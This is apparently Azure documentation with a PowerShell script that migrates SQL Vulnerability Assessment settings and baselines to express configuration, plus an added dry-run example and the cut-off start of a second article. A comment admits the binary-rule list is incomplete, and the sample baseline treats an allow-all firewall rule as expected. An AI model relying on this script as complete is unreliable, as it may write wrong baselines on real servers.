This sample requires Azure PowerShell Az 1.0 or later. Run Get-Module -ListAvailable Az to see which versions are installed. If you need to install, see Install Azure PowerShell module.

Run Connect-AzAccount to sign in to Azure.

If you don't have an Azure subscription, create an Azure free account before you begin.

- The user should have the Storage Blob Data Reader role on the storage account.
- Storage networking settings must be configured to allow access to the machine that executes the command.
- You must have permission to create folders in the working directory used by the script.

Sample script - MigratingToExpressConfiguration.ps1

Note: We recommend that you use the Azure Az PowerShell module to interact with Azure. See Install Azure PowerShell to get started. To learn how to migrate to the Az PowerShell module, see Migrate Azure PowerShell from AzureRM to Az.

PowerShell


#Requires -Modules @{ ModuleName="Az.Sql"; ModuleVersion="3.11.0" }
#Requires -Modules @{ ModuleName="Az.Storage"; ModuleVersion="4.8.0" }
#Requires -Modules @{ ModuleName="Az.Accounts"; ModuleVersion="2.9.1" }
#Requires -Version 5.1

<#
.SYNOPSIS
This script configures an Azure SQL Server for the express configuration
Vulnerability Assessment feature, scans all databases that belong to the
selected server and sets baselines (if defined in the classic configuration)
from the storage account that is configured in the policy.

.DESCRIPTION
This script migrates an Azure SQL Server to the express configuration
Vulnerability Assessment feature by executing the following steps:
- It deletes the current Vulnerability Assessment settings (if they exist).
  This step resets all the Vulnerability Assessment scans and baselines
  for all databases.
- It copies the current baselines (if they exist) from the customer's storage.

To revert this script, follow the instructions here:
https://learn.microsoft.com/en-us/azure/defender-for-cloud/sql-azure-vulnerability-assessment-manage?tabs=express#revert-back-to-the-classic-configuration

.PARAMETER SubscriptionId
The subscription id that the server belongs to.

.PARAMETER ResourceGroupName
The resource group that the server belongs to.

.PARAMETER ServerName
The SQL server name that we want to apply the new SQL Vulnerability
Assessment policy to.

.PARAMETER Force
Removes the old Vulnerability Assessment setting without asking for
confirmation.

.EXAMPLE
.\MigratingToExpressConfiguration.ps1 -SubscriptionId "25b642fc-05c3-11ed-b939-0242ac120002" -ResourceGroupName "ResourceGroup01" -ServerName "Server01" -Force

.EXAMPLE
.\MigratingToExpressConfiguration.ps1 -SubscriptionId "25b642fc-05c3-11ed-b939-0242ac120002" -ResourceGroupName "ResourceGroup01" -ServerName "Server01"
#>

param
(
    [Parameter(Mandatory = $True)]
    [string]$SubscriptionId,

    [Parameter(Mandatory = $True)]
    [string]$ResourceGroupName,

    [Parameter(Mandatory = $True)]
    [string]$ServerName,

    [Parameter(Mandatory = $False)]
    [switch]$Force
)

###### New SQL Vulnerability Assessment Commands ######

function GetSqlVulnerabilityAssessmentServerSetting($SubscriptionId, $ResourceGroupName, $ServerName) {
    $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default?api-version=2022-02-01-preview"
    return SendRestRequest -Method "Get" -Uri $Uri
}

function SetSqlVulnerabilityAssessmentServerSetting($SubscriptionId, $ResourceGroupName, $ServerName) {
    $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default?api-version=2022-02-01-preview"

    $Body = @{
        properties = @{
            state = "Enabled"
        }
    }
    $Body = $Body | ConvertTo-Json
    return SendRestRequest -Method "Put" -Uri $Uri -Body $Body
}

function SetSqlVulnerabilityAssessmentBaselineOnUserDatabase($SubscriptionId, $ResourceGroupName, $ServerName, $DatabaseName, $Baseline) {
    $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAssessments/default/baselines/default?api-version=2022-02-01-preview"

    $convertedBaseline = $Baseline | ConvertFrom-Json

    $properties = @{
        properties = @{
            latestScan = $false
            results    = @{}
        }
    }

    if ($convertedBaseline.RuleBaselines.Count -eq 0) {
        # baseline is null/empty. No need to send the API call.
        return
    }

    foreach ($rule in $convertedBaseline.RuleBaselines) {
        $ruleId = $rule.RuleId
        $expectedResults = $rule.Properties.ExpectedResults

        # Binary rules are stored as "1"/"0" in the classic baseline; express expects "True"/"False".
        if ($ruleId -in $VABinaryRules) {
            if ($expectedResults[0][0] -eq "1") {
                $expectedResults[0][0] = "True"
            }
            else {
                $expectedResults[0][0] = "False"
            }
        }

        $properties.properties.results[$ruleId] = $expectedResults
    }

    $Body = $properties | ConvertTo-Json -Depth 5
    return SendRestRequest -Method "Put" -Uri $Uri -Body $Body
}

function SetSqlVulnerabilityAssessmentBaselineOnSystemDatabase($SubscriptionId, $ResourceGroupName, $ServerName, $DatabaseName, $Baseline) {
    $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baselines/default?api-version=2022-02-01-preview&systemDatabaseName=master"

    $convertedBaseline = $Baseline | ConvertFrom-Json

    $properties = @{
        properties = @{
            latestScan = $false
            results    = @{}
        }
    }

    if ($convertedBaseline.RuleBaselines.Count -eq 0) {
        # baseline is null/empty. No need to send the API call.
        return
    }

    foreach ($rule in $convertedBaseline.RuleBaselines) {
        $ruleId = $rule.RuleId
        $expectedResults = $rule.Properties.ExpectedResults

        if ($ruleId -in $VABinaryRules) {
            if ($expectedResults[0][0] -eq "1") {
                $expectedResults[0][0] = "True"
            }
            else {
                $expectedResults[0][0] = "False"
            }
        }

        $properties.properties.results[$ruleId] = $expectedResults
    }

    $Body = $properties | ConvertTo-Json -Depth 5
    return SendRestRequest -Method "Put" -Uri $Uri -Body $Body
}

function RunSqlVulnerabilityAssessmentScanOnUserDatabase($SubscriptionId, $ResourceGroupName, $ServerName, $DatabaseName) {
    $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAssessments/default/initiateScan?api-version=2022-02-01-preview"
    SendRestRequest -Method "Post" -Uri $Uri
}

function RunSqlVulnerabilityAssessmentScanOnSystemDatabase($SubscriptionId, $ResourceGroupName, $ServerName, $DatabaseName) {
    $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/initiateScan?api-version=2022-02-01-preview&systemDatabaseName=$DatabaseName"
    SendRestRequest -Method "Post" -Uri $Uri
}

function GetSqlVulnerabilityAssessmentScanOnUserDatabase($SubscriptionId, $ResourceGroupName, $ServerName, $DatabaseName) {
    $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAssessments/default/scans/latest?api-version=2022-02-01-preview"
    return SendRestRequest -Method "Get" -Uri $Uri
}

function GetSqlVulnerabilityAssessmentScanOnSystemDatabase($SubscriptionId, $ResourceGroupName, $ServerName, $DatabaseName) {
    $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/scans/latest?api-version=2022-02-01-preview&systemDatabaseName=$DatabaseName"
    return SendRestRequest -Method "Get" -Uri $Uri
}

function SendRestRequest(
    [Parameter(Mandatory = $True)]
    [string] $Method,
    [Parameter(Mandatory = $True)]
    [string] $Uri,
    [Parameter(Mandatory = $false)]
    [string] $Body = "DEFAULT") {

    # Invoke-AzRestMethod uses the signed-in Az context, so no token handling is needed here.
    $Params = @{
        Method = $Method
        Path   = $Uri
    }
    if (!($Body -eq "DEFAULT")) {
        $Params = @{
            Method  = $Method
            Path    = $Uri
            Payload = $Body
        }
    }

    Invoke-AzRestMethod @Params
}

function LogMessage {
    [CmdletBinding()]
    Param
    (
        [Parameter(Mandatory = $true, Position = 0)]
        [string]$LogMessage
    )

    Write-Host ("{0} - {1}" -f (Get-Date), $LogMessage)
}

function LogError {
    [CmdletBinding()]
    Param
    (
        [Parameter(Mandatory = $true, Position = 0)]
        [string]$LogMessage
    )

    Write-Error ("{0} - {1}" -f (Get-Date), $LogMessage)
}

function Retry() {
    param(
        [Parameter(Mandatory = $true)][Action]$action,
        [Parameter(Mandatory = $false)][int]$maxAttempts = 3
    )

    $attempts = 1

    do {
        try {
            $result = $action.Invoke()
            return $result
        }
        catch [Exception] {
            LogMessage -LogMessage $_.Exception.Message

            # exponential backoff delay
            $attempts++
            if ($attempts -le $maxAttempts) {
                $retryDelaySeconds = [math]::Pow(2, $attempts)
                $retryDelaySeconds = $retryDelaySeconds - 1 # Exponential Backoff Max == (2^n)-1
                LogMessage -LogMessage ("Action failed. Waiting " + $retryDelaySeconds + " seconds before attempt " + $attempts + " of " + $maxAttempts + ".")
                Start-Sleep $retryDelaySeconds
            }
            else {
                LogError $_.Exception.Message
                $ex = New-Object System.Exception($_.Exception.Message)
                throw $ex
            }
        }
    } while ($attempts -le $maxAttempts)
}

function HaveVulnerabilityAssessmentSetting($ResourceGroupName, $ServerName, $Databases) {
    # Check if we have a server setting.
    LogMessage -LogMessage "Check Vulnerability Assessment setting for '$($ServerName)' server"

    $vaServerSetting = Get-AzSqlServerVulnerabilityAssessmentSetting -ResourceGroupName $ResourceGroupName -ServerName $ServerName

    if (![string]::IsNullOrEmpty($vaServerSetting.StorageAccountName)) {
        return $true
    }

    # Check if we have a database setting for the server
    foreach ($database in $Databases) {
        LogMessage -LogMessage "Check VA settings for '$($database.DatabaseName)' database"
        $vaDatabaseSetting = Get-AzSqlDatabaseVulnerabilityAssessmentSetting -ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName $database.DatabaseName
        if (![string]::IsNullOrEmpty($vaDatabaseSetting.StorageAccountName)) {
            return $true
        }
    }

    return $false
}

function HaveExpressConfigurationVulnerabilityAssessmentSetting($SubscriptionId, $ResourceGroupName, $ServerName) {
    # Check if we have a server setting.
    LogMessage -LogMessage "Check express configuration Vulnerability Assessment setting for '$($ServerName)' server"

    $Response = GetSqlVulnerabilityAssessmentServerSetting -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName

    if ($Response.Content.Contains("Enabled")) {
        return $true
    }

    return $false
}

function GetBlobsFromStorage($ContainerName, $Context) {
    # Use Get-AzStorageBlob to retrieve a list of blobs from the container
    $blobs = Get-AzStorageBlob -Container $ContainerName -Context $Context

    if ([string]::IsNullOrEmpty($blobs)) {
        return
    }

    return $blobs
}

function ExtractBaselineBlobName($ServerName, $DatabaseName, $Blobs) {
    $prefix = "scans/$ServerName/$DatabaseName/baseline"

    # Filter the list to include only blobs with names starting with the baseline prefix
    $baselineBlobs = $Blobs | Where-Object { $_.Name.StartsWith($prefix) }

    if ($baselineBlobs.Count -eq 0) {
        return
    }
    else {
        # Sort the list by LastModified descending and get the first item
        $mostRecentBlob = $baselineBlobs | Sort-Object LastModified -Descending | Select-Object -First 1

        # Get the name of the most recent blob
        $mostRecentBlobName = $mostRecentBlob.Name

        LogMessage -LogMessage "The most recent blob with the 'baseline' prefix is: $mostRecentBlobName"

        return $mostRecentBlobName
    }
}

function ReadDatabaseBaselineFromStorage($ServerName, $BlobName, $ContainerName, $Context) {
    # Get-AzStorageBlobContent downloads the blob under the current directory (the "scans" folder
    # that ClearBaselineFolder removes); the text is then read from the blob reference.
    $blobContent = Get-AzStorageBlobContent -Blob $BlobName -Container $ContainerName -Context $Context

    $blobContent = $blobContent.ICloudBlob.DownloadText()

    if ([string]::IsNullOrEmpty($blobContent)) {
        return
    }

    return $blobContent
}

function GetBaselineConfigurationForDatabase($ServerName, $DatabaseName, $VaDatabasePolicyStorage, $VaDatabasePolicyContainer) {
    # Get storage account context
    $ctx = New-AzStorageContext -StorageAccountName $VaDatabasePolicyStorage

    # List the blobs in the scan results container
    $blobs = GetBlobsFromStorage -ContainerName $VaDatabasePolicyContainer -Context $ctx
    if ([string]::IsNullOrEmpty($blobs)) {
        $ex = New-Object System.Exception("Failed to get blobs from the storage. Verify that you have Storage Blob Data Reader role assignment on the storage.")
        throw $ex
    }

    # Extract baseline blob name
    $blobName = ExtractBaselineBlobName -ServerName $ServerName -DatabaseName $DatabaseName -Blobs $blobs
    if ([string]::IsNullOrEmpty($blobName)) {
        LogMessage -LogMessage "No baseline blob was found for $DatabaseName database."
        return
    }

    # Extract the baseline
    $baseline = ReadDatabaseBaselineFromStorage -ServerName $ServerName -BlobName $blobName -ContainerName $VaDatabasePolicyContainer -Context $ctx
    if ([string]::IsNullOrEmpty($baseline)) {
        $ex = New-Object System.Exception("Failed to get blobs from the storage. Verify that you have Storage Blob Data Reader role assignment on the storage.")
        throw $ex
    }

    LogMessage -LogMessage "Found baseline for $($DatabaseName) database."
    return $baseline
}

function ClearBaselineFolder() {
    # Clean baseline folder
    $scriptPath = Get-Location
    $folderPath = Join-Path -Path $scriptPath.Path -ChildPath "scans"

    if (Test-Path $folderPath) {
        # Remove folder from previous runs
        Remove-Item $folderPath -Recurse
    }
}

######################################################

# Rules whose classic baseline value is "1"/"0" and must be written as "True"/"False" in express configuration.
# Some rule IDs in this list could not be read from the source page and are not included.
$VABinaryRules = @("VA1018", "VA1022", "VA1023", "VA1024", "VA1043", "VA1044", "VA1045", "VA1051", "VA1052", "VA1053", "VA1058", "VA1059",
    "VA1067", "VA1071", "VA1072", "VA1091", "VA1092", "VA1093", "VA1102",
    "VA1230", "VA1245", "VA1265",
    "VA2060", "VA2124", "VA2128")

# Connect
$subscription = Connect-AzAccount -Subscription $SubscriptionId
if ([string]::IsNullOrEmpty($subscription)) {
    LogError "Failed to get the subscription. Migration cancelled. Fix errors and try again later."
    return
}

$srv = Get-AzSqlServer -ResourceGroupName $ResourceGroupName -ServerName $ServerName
if ([string]::IsNullOrEmpty($srv)) {
    LogError "The server was not found. Migration cancelled. Fix errors and try again later."
    return
}

ClearBaselineFolder
$baselines = @{}

$databases = Get-AzSqlDatabase -ResourceGroupName $ResourceGroupName -ServerName $ServerName | Where-Object { $_.DatabaseName -ne "master" }
$haveVaSetting = HaveVulnerabilityAssessmentSetting -ResourceGroupName $ResourceGroupName -ServerName $ServerName -Databases $databases
$haveExpressConfigurationVA = HaveExpressConfigurationVulnerabilityAssessmentSetting -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName

if ($haveExpressConfigurationVA) {
    LogMessage -LogMessage "Express configuration vulnerability assessment setting already exists on this server. Cancelling script."
    return
}

if ($haveVaSetting) {
    # Get server policy container path
    $vaServerSetting = Get-AzSqlServerVulnerabilityAssessmentSetting -ResourceGroupName $ResourceGroupName -ServerName $ServerName
    $vaServerPolicyStorage = $vaServerSetting.StorageAccountName
    $vaServerPolicyContainer = $vaServerSetting.ScanResultsContainerName

    $canRemoveVa = $true

    # Go over each database and get the baseline (if it exists).
    $i = 0
    foreach ($database in $databases) {
        $i += 1

        $completed = ($i / $databases.Count) * 100
        Write-Progress -Activity "Processing" -Status "Progress:" -PercentComplete $completed

        LogMessage -LogMessage "Starting to fetch baseline for $($database.DatabaseName) database."

        $vaDatabaseSetting = Get-AzSqlDatabaseVulnerabilityAssessmentSetting -ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName $database.DatabaseName

        $adsDatabasePolicy = Get-AzSqlDatabaseAdvancedThreatProtectionSetting -ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName $database.DatabaseName

        # Handle breaking changes in the command: older Az.Sql versions expose ThreatDetectionState,
        # newer ones expose AdvancedThreatProtectionState.
        $adsDatabasePolicyEnabled = (![string]::IsNullOrEmpty($adsDatabasePolicy.ThreatDetectionState) -and $adsDatabasePolicy.ThreatDetectionState -eq "Enabled") -or (![string]::IsNullOrEmpty($adsDatabasePolicy.AdvancedThreatProtectionState) -and $adsDatabasePolicy.AdvancedThreatProtectionState -eq "Enabled")

        $containsDatabasePolicy = $adsDatabasePolicyEnabled -and ![string]::IsNullOrEmpty($vaDatabaseSetting.StorageAccountName)

        if ($containsDatabasePolicy) {
            # The database has a database policy. Use the database policy storage.
            $vaDatabasePolicyStorage = $vaDatabaseSetting.StorageAccountName
            $vaDatabasePolicyContainer = $vaDatabaseSetting.ScanResultsContainerName
        }
        else {
            $vaDatabasePolicyStorage = $vaServerPolicyStorage
            $vaDatabasePolicyContainer = $vaServerPolicyContainer
        }

        try {
            $baseline = GetBaselineConfigurationForDatabase -ServerName $ServerName -DatabaseName $database.DatabaseName -VaDatabasePolicyStorage $vaDatabasePolicyStorage -VaDatabasePolicyContainer $vaDatabasePolicyContainer
            $baselines[$database.DatabaseName] = $baseline
            LogMessage -LogMessage "Finished fetching baseline for $($database.DatabaseName) database."
        }
        catch {
            LogError "An error occurred: $($_.Exception.Message) while handling $($database.DatabaseName) database."
            $canRemoveVa = $false
        }
    }

    # Get the baseline of the master database (if it exists).
    try {
        LogMessage -LogMessage "Starting to fetch baseline for master database."
        $baseline = GetBaselineConfigurationForDatabase -ServerName $ServerName -DatabaseName "master" -VaDatabasePolicyStorage $vaServerPolicyStorage -VaDatabasePolicyContainer $vaServerPolicyContainer
        $baselines["master"] = $baseline
        LogMessage -LogMessage "Finished fetching baseline for master database."
    }
    catch {
        LogError "An error occurred: $($_.Exception.Message) while handling master database."
        $canRemoveVa = $false
    }

    ClearBaselineFolder

    if ($canRemoveVa) {
        if (!$Force) {
            LogMessage -LogMessage "We are going to remove the current Vulnerability Assessment settings for this server and underlying databases."
            $Confirmation = Read-Host -Prompt "Do you approve (y/n)?"
            if ($Confirmation -ne "y") {
                LogMessage -LogMessage "You chose to stop the migration process. Existing VA settings will not be changed."
                return
            }
        }

        # Clear all server and database policies
        $i = 0
        foreach ($database in $databases) {
            $i += 1

            $completed = ($i / $databases.Count) * 100
            Write-Progress -Activity "Processing" -Status "Progress:" -PercentComplete $completed

            LogMessage -LogMessage "Clear Vulnerability Assessment setting for '$($database.DatabaseName)' database."
            Clear-AzSqlDatabaseVulnerabilityAssessmentSetting -ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName $database.DatabaseName
        }

        # Removing old server Vulnerability Assessment setting
        LogMessage -LogMessage "Clear Vulnerability Assessment setting for '$($ServerName)' server."
        Clear-AzSqlServerVulnerabilityAssessmentSetting -ResourceGroupName $ResourceGroupName -ServerName $ServerName
    }
    else {
        LogError "Migration cancelled. Fix errors and try again later."
        return
    }
}

# Set new SQL Vulnerability Assessment Setting
LogMessage -LogMessage "Add express configuration Vulnerability Assessment feature setting for '$($ServerName)' server."

$Response = SetSqlVulnerabilityAssessmentServerSetting -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName

$successStatusCodes = @(200, 201, 202)

if ($Response.StatusCode -in $successStatusCodes) {
    LogMessage -LogMessage "Congratulations, your server '$($ServerName)' is set up with the express configuration Vulnerability Assessment feature"
}
else {
    LogMessage -LogMessage "There was a problem enabling the express configuration Vulnerability Assessment feature on the '$($ServerName)' server. Error '$($Response.StatusCode)': '$($Response.Content)'"
    return
}

# Run a new scan on all the databases
$i = 0
foreach ($database in $databases) {
    $i += 1

    $completed = ($i / $databases.Count) * 100
    Write-Progress -Activity "Processing" -Status "Progress:" -PercentComplete $completed

    LogMessage -LogMessage "Run scan on '$($database.DatabaseName)' database."

    Retry -action { RunSqlVulnerabilityAssessmentScanOnUserDatabase -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName $database.DatabaseName }
}

LogMessage -LogMessage "Run scan on 'master' database."

Retry -action { RunSqlVulnerabilityAssessmentScanOnSystemDatabase -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName "master" }

LogMessage -LogMessage "Wait for scan results..."
Start-Sleep 60

# Wait for scan results
$i = 0
foreach ($database in $databases) {
    $i += 1

    $completed = ($i / $databases.Count) * 100
    Write-Progress -Activity "Processing" -Status "Progress:" -PercentComplete $completed

    try {
        LogMessage -LogMessage "Waiting for results for $($database.DatabaseName) database."

        Retry -action { GetSqlVulnerabilityAssessmentScanOnUserDatabase -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName $database.DatabaseName }

        LogMessage -LogMessage "Received results for $($database.DatabaseName) database."
    }
    catch {
        LogMessage -LogMessage "Failed to get latest scan results for $($database.DatabaseName). Stopping the migration."
        LogMessage -LogMessage "You can revert back to classic configuration. For more information: https://learn.microsoft.com/en-us/azure/defender-for-cloud/sql-azure-vulnerability-assessment-manage?tabs=express#revert-back-to-the-classic-configuration"
        return
    }
}

try {
    LogMessage -LogMessage "Waiting for results for master database"

    Retry -action { GetSqlVulnerabilityAssessmentScanOnSystemDatabase -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName "master" }
}
catch {
    LogMessage -LogMessage "Failed to get latest scan results for master. Stopping the migration"
    LogMessage -LogMessage "You can revert back to classic configuration. For more information: https://learn.microsoft.com/en-us/azure/defender-for-cloud/sql-azure-vulnerability-assessment-manage?tabs=express#revert-back-to-the-classic-configuration"
    return
}

# Apply baselines for each database
$successMigration = @()
$failedMigration = @()
if (!$haveVaSetting) {
    # no need to migrate baselines as there is no baseline to extract.
    $successMigration = $databases
}
else {
    $i = 0
    foreach ($database in $databases) {
        $i += 1

        $completed = ($i / $databases.Count) * 100
        Write-Progress -Activity "Processing" -Status "Progress:" -PercentComplete $completed

        try {
            if (![string]::IsNullOrEmpty($baselines[$database.DatabaseName])) {
                LogMessage -LogMessage "Applying baseline for '$($database.DatabaseName)' database."

                Retry -action { SetSqlVulnerabilityAssessmentBaselineOnUserDatabase -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName $database.DatabaseName -Baseline $baselines[$database.DatabaseName] }
            }
            LogMessage -LogMessage "Baseline was successfully applied for '$($database.DatabaseName)' database."
            $successMigration += $database.DatabaseName
        }
        catch {
            LogError "Failed to set baseline for $($database.DatabaseName) database."
            $failedMigration += $database.DatabaseName
        }
    }

    try {
        if (![string]::IsNullOrEmpty($baselines["master"])) {
            LogMessage -LogMessage "Applying baseline for 'master' database."

            Retry -action { SetSqlVulnerabilityAssessmentBaselineOnSystemDatabase -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName "master" -Baseline $baselines["master"] }

            $successMigration += "master"
        }
    }
    catch {
        LogError "Failed to set baseline for master database."
        $failedMigration += "master"
    }
}

if ($successMigration.Count -eq 0) {
    LogError "Failed to set baseline for all the databases."
    LogMessage -LogMessage "You can revert back to classic configuration. For more information: https://learn.microsoft.com/en-us/azure/defender-for-cloud/sql-azure-vulnerability-assessment-manage?tabs=express#revert-back-to-the-classic-configuration"
}
elseif ($failedMigration.Count -eq 0) {
    LogMessage -LogMessage "The migration process completed successfully."
}
else {
    LogMessage -LogMessage "The migration process completed. The migration was successful for $($successMigration -join ',') and unsuccessful for $($failedMigration -join ',')"
    LogMessage -LogMessage "You can revert back to classic configuration. For more information: https://learn.microsoft.com/en-us/azure/defender-for-cloud/sql-azure-vulnerability-assessment-manage?tabs=express#revert-back-to-the-classic-configuration"
}
For example: 

PowerShell 

Write-Host "----------- Migrating To express configuration example ---------"
$ServerName = "<Your server name>"                  # The server name.
$SubscriptionId = "<Your subscription>"             # The subscription id that the servers belong to.
$ResourceGroupName = "<Your resource group name>"   # The resource group name that the servers belong to.

.\MigratingToExpressConfiguration.ps1 -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName
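Two per-database decisions in the migration script above are worth checking before the script deletes the classic settings: which storage account and container the classic baseline is read from (database-level policy only when the database's Advanced Threat Protection setting is enabled and the database VA setting has its own storage account, otherwise the server-level policy), and how the classic baseline document is rewritten into the express configuration baseline body (binary rules change from "1"/"0" to "True"/"False", and an empty baseline sends no PUT at all). The following is an added example, not part of the Microsoft script, that isolates both decisions into functions you can run offline as a dry run. The settings objects and the classic baseline JSON are constructed for the example; the property names (StorageAccountName, ScanResultsContainerName, ThreatDetectionState, AdvancedThreatProtectionState, RuleBaselines, RuleId, ExpectedResults) are the ones the script reads, and the binary-rule subset is taken from the script's $VABinaryRules list plus the VA1143 and VA1219 rules that the wrapper module examples on this page show with True/False values.

```powershell
# Added example, not part of the Microsoft migration script: an offline dry run of the two
# per-database decisions the script makes, using constructed settings and a constructed baseline.

function Resolve-VaBaselineSource {
    # Same rule as the script: use the database-level policy storage only when the database's
    # Advanced Threat Protection setting is enabled AND the database VA setting has its own
    # storage account; otherwise fall back to the server-level policy storage.
    param(
        [Parameter(Mandatory)] $ServerVaSetting,    # shape of Get-AzSqlServerVulnerabilityAssessmentSetting output
        [Parameter(Mandatory)] $DatabaseVaSetting,  # shape of Get-AzSqlDatabaseVulnerabilityAssessmentSetting output
        [Parameter(Mandatory)] $DatabaseAtpSetting  # shape of Get-AzSqlDatabaseAdvancedThreatProtectionSetting output
    )
    # Older Az.Sql versions expose ThreatDetectionState, newer ones AdvancedThreatProtectionState.
    $atpEnabled = ($DatabaseAtpSetting.ThreatDetectionState -eq "Enabled") -or
                  ($DatabaseAtpSetting.AdvancedThreatProtectionState -eq "Enabled")
    $hasDbStorage = -not [string]::IsNullOrEmpty($DatabaseVaSetting.StorageAccountName)

    if ($atpEnabled -and $hasDbStorage) {
        return [pscustomobject]@{ Scope = "Database"; StorageAccount = $DatabaseVaSetting.StorageAccountName; Container = $DatabaseVaSetting.ScanResultsContainerName }
    }
    return [pscustomobject]@{ Scope = "Server"; StorageAccount = $ServerVaSetting.StorageAccountName; Container = $ServerVaSetting.ScanResultsContainerName }
}

function ConvertTo-ExpressBaselineBody {
    # Rewrites a classic baseline document into the express configuration baselines body.
    # Returns $null for an empty baseline, the case in which the script skips the PUT.
    param(
        [Parameter(Mandatory)] [string]   $ClassicBaselineJson,
        [Parameter(Mandatory)] [string[]] $BinaryRules
    )
    $classic = $ClassicBaselineJson | ConvertFrom-Json
    if (-not $classic.RuleBaselines -or $classic.RuleBaselines.Count -eq 0) { return $null }

    $results = @{}
    foreach ($rule in $classic.RuleBaselines) {
        # Copy each expected row into a string[] so the first cell can be rewritten in place.
        $expected = @($rule.Properties.ExpectedResults | ForEach-Object { , [string[]]$_ })
        if ($rule.RuleId -in $BinaryRules) {
            # Classic stores binary findings as "1"/"0"; express expects "True"/"False".
            $expected[0][0] = if ($expected[0][0] -eq "1") { "True" } else { "False" }
        }
        $results[$rule.RuleId] = $expected
    }
    $body = @{ properties = @{ latestScan = $false; results = $results } }
    return ($body | ConvertTo-Json -Depth 5 -Compress)
}

# ---- Constructed sample input (placeholder names, not real resources) ----
$serverSetting   = [pscustomobject]@{ StorageAccountName = "stserverpolicy"; ScanResultsContainerName = "vulnerability-assessment" }
$dbWithOwnPolicy = [pscustomobject]@{ StorageAccountName = "stdbpolicy";     ScanResultsContainerName = "db-scans" }
$dbNoPolicy      = [pscustomobject]@{ StorageAccountName = $null;            ScanResultsContainerName = $null }
$atpOn           = [pscustomobject]@{ AdvancedThreatProtectionState = "Enabled" }
$atpOffLegacy    = [pscustomobject]@{ ThreatDetectionState = "Disabled" }

# Constructed classic baseline with one binary rule and one VA2062 (server firewall rules) entry.
$classicBaseline = @'
{
  "RuleBaselines": [
    { "RuleId": "VA1143", "Properties": { "ExpectedResults": [["1"]] } },
    { "RuleId": "VA2062", "Properties": { "ExpectedResults": [["AllowAll", "0.0.0.0", "255.255.255.255"]] } }
  ]
}
'@
# Subset of the script's $VABinaryRules list plus the True/False rules shown in the wrapper examples.
$binaryRules = @("VA1018", "VA1022", "VA1143", "VA1219")

$cases = @(
    @{ Name = "db-with-own-policy";    Va = $dbWithOwnPolicy; Atp = $atpOn },
    @{ Name = "db-policy-but-atp-off"; Va = $dbWithOwnPolicy; Atp = $atpOffLegacy },
    @{ Name = "db-without-policy";     Va = $dbNoPolicy;      Atp = $atpOn }
)
foreach ($case in $cases) {
    $src = Resolve-VaBaselineSource -ServerVaSetting $serverSetting -DatabaseVaSetting $case.Va -DatabaseAtpSetting $case.Atp
    Write-Host ("{0,-25} reads baseline from {1,-8} policy: {2}/{3}" -f $case.Name, $src.Scope, $src.StorageAccount, $src.Container)
}

Write-Host "Express body for the constructed classic baseline:"
ConvertTo-ExpressBaselineBody -ClassicBaselineJson $classicBaseline -BinaryRules $binaryRules

$empty = ConvertTo-ExpressBaselineBody -ClassicBaselineJson '{ "RuleBaselines": [] }' -BinaryRules $binaryRules
Write-Host ("Empty classic baseline produces a body: " + ($null -ne $empty))
```

Only the first case resolves to the database-level storage; a database-level storage account with Advanced Threat Protection disabled, or an enabled setting without its own storage account, both fall back to the server policy, which is the same outcome the script's $containsDatabasePolicy test produces. In the generated body VA1143 appears as [["True"]] while the VA2062 row is passed through unchanged, matching the value shapes in the wrapper module examples. Because both functions are pure, you can point them at the real objects returned by the Az.Sql cmdlets and at a baseline blob downloaded from the classic storage to review what the migration would write before running it.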


Next steps 


For more information on the Azure PowerShell module, see Azure PowerShell 
documentation. 


Set up baselines for vulnerability assessments on Azure SQL databases 


Article · 04/13/2023 


This PowerShell script sets up baselines based on the latest vulnerability assessment scan 
results for all databases in an Azure SQL Server. 


This sample requires Azure PowerShell Az 1.0 or later. Run Get-Module -ListAvailable 
Az to see which versions are installed. If you need to install, see Install Azure PowerShell 
module. 
Run Connect-AzAccount to sign in to Azure. 


If you don't have an Azure subscription, create an Azure free account before you 
begin. 


Sample script 


Note 


We recommend that you use the Azure Az PowerShell module to interact with 
Azure. See Install Azure PowerShell to get started. To learn how to migrate to the 
Az PowerShell module, see Migrate Azure PowerShell from AzureRM to Az. 


PowerShell 


<#
.SYNOPSIS
This script sets the results of the last successful scan as the baseline for
each database under the selected Azure SQL Server.

.DESCRIPTION
This script checks whether the selected Azure SQL Server uses Vulnerability
Assessment express configuration, iterates through all user databases under
